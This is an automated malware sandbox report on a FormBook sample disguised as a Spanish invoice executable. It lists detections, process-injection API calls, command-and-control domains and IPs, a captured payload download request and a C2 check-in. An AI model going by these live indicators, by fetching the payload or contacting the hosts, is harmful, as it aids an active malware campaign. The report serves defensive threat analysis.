Windows Analysis Report
FACTURA PROFORMA MATRICULACI#U00d3N.exe

AV Detection

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Avira: detected

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe	ReversingLabs: Detection: 21%
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe	Virustotal: Detection: 25%			Perma Link

Source: Yara match	File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Spreading

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405C4D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_00402930 FindFirstFileW,		0_2_00402930
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,		0_2_0040689E

Software Vulnerabilities

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 4x nop then mov ebx, 00000004h		2_2_3643052F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_006DC52F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_04912F18
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_04C1052F

Networking

Source: Network traffic

Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 67.223.117.189:80

Source: Joe Sandbox View

IP Address: 67.223.117.189 67.223.117.189

Source: Joe Sandbox View

ASN Name: VIMRO-AS15189US VIMRO-AS15189US

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 212.162.149.165:80

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.165

Source: global traffic

HTTP traffic detected: GET /psKGLMYRljeu25.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 212.162.149.165Cache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1Host: www.flourishno.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.fullhdfilmizlesene.uno
Source: global traffic	DNS traffic detected: DNS query: www.brunokito.cloud
Source: global traffic	DNS traffic detected: DNS query: www.flourishno.life

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:20:57 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/Q
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin9
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binE
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bino
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binu
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: RAVCpl64.exe, 00000003.00000002.88184446311.0000000005CB8000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: rasphone.exe, 00000004.00000003.84675419748.00000000079FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405705

E-Banking Fraud

Source: Yara match	File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367734E0 NtCreateMutant,LdrInitializeThunk,		2_2_367734E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772EB0 NtProtectVirtualMemory,LdrInitializeThunk,		2_2_36772EB0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772D10 NtQuerySystemInformation,LdrInitializeThunk,		2_2_36772D10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772A80 NtClose,LdrInitializeThunk,		2_2_36772A80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772BC0 NtQueryInformationToken,LdrInitializeThunk,		2_2_36772BC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772B90 NtFreeVirtualMemory,LdrInitializeThunk,		2_2_36772B90
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36774570 NtSuspendThread,		2_2_36774570
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36774260 NtSetContextThread,		2_2_36774260
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772E50 NtCreateSection,		2_2_36772E50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772E00 NtQueueApcThread,		2_2_36772E00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772ED0 NtResumeThread,		2_2_36772ED0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772EC0 NtQuerySection,		2_2_36772EC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772E80 NtCreateProcessEx,		2_2_36772E80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772F30 NtOpenDirectoryObject,		2_2_36772F30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772F00 NtCreateFile,		2_2_36772F00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772FB0 NtSetValueKey,		2_2_36772FB0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772C50 NtUnmapViewOfSection,		2_2_36772C50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36773C30 NtOpenProcessToken,		2_2_36773C30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772C30 NtMapViewOfSection,		2_2_36772C30
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772C20 NtSetInformationFile,		2_2_36772C20
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772C10 NtOpenProcess,		2_2_36772C10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772CF0 NtDelayExecution,		2_2_36772CF0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772CD0 NtEnumerateKey,		2_2_36772CD0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36773C90 NtOpenThread,		2_2_36773C90
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772D50 NtWriteVirtualMemory,		2_2_36772D50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772DC0 NtAdjustPrivilegesToken,		2_2_36772DC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772DA0 NtReadVirtualMemory,		2_2_36772DA0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772A10 NtWriteFile,		2_2_36772A10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772AC0 NtEnumerateValueKey,		2_2_36772AC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772AA0 NtQueryInformationFile,		2_2_36772AA0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772B20 NtQueryInformationProcess,		2_2_36772B20
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772B10 NtAllocateVirtualMemory,		2_2_36772B10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772B00 NtQueryValueKey,		2_2_36772B00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772BE0 NtQueryVirtualMemory,		2_2_36772BE0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772B80 NtCreateKey,		2_2_36772B80
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367738D0 NtGetContextThread,		2_2_367738D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367729F0 NtReadFile,		2_2_367729F0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367729D0 NtWaitForSingleObject,		2_2_367729D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36443619 NtSetContextThread,		2_2_36443619
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36443C5A NtResumeThread,		2_2_36443C5A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36443944 NtSuspendThread,		2_2_36443944
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_049168F2 SleepEx,NtCreateSection,		3_2_049168F2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04916A7D SleepEx,NtResumeThread,		3_2_04916A7D
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882CF0 NtDelayExecution,LdrInitializeThunk,		4_2_04882CF0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882C30 NtMapViewOfSection,LdrInitializeThunk,		4_2_04882C30
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882D10 NtQuerySystemInformation,LdrInitializeThunk,		4_2_04882D10
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882E50 NtCreateSection,LdrInitializeThunk,		4_2_04882E50
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882F00 NtCreateFile,LdrInitializeThunk,		4_2_04882F00
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048829F0 NtReadFile,LdrInitializeThunk,		4_2_048829F0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882A80 NtClose,LdrInitializeThunk,		4_2_04882A80
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882AC0 NtEnumerateValueKey,LdrInitializeThunk,		4_2_04882AC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882A10 NtWriteFile,LdrInitializeThunk,		4_2_04882A10
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882B80 NtCreateKey,LdrInitializeThunk,		4_2_04882B80
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882B90 NtFreeVirtualMemory,LdrInitializeThunk,		4_2_04882B90
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882BC0 NtQueryInformationToken,LdrInitializeThunk,		4_2_04882BC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882B00 NtQueryValueKey,LdrInitializeThunk,		4_2_04882B00
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882B10 NtAllocateVirtualMemory,LdrInitializeThunk,		4_2_04882B10
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048834E0 NtCreateMutant,LdrInitializeThunk,		4_2_048834E0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04884570 NtSuspendThread,		4_2_04884570
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04884260 NtSetContextThread,		4_2_04884260
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882CD0 NtEnumerateKey,		4_2_04882CD0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882C10 NtOpenProcess,		4_2_04882C10
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882C20 NtSetInformationFile,		4_2_04882C20
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882C50 NtUnmapViewOfSection,		4_2_04882C50
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882DA0 NtReadVirtualMemory,		4_2_04882DA0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882DC0 NtAdjustPrivilegesToken,		4_2_04882DC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882D50 NtWriteVirtualMemory,		4_2_04882D50
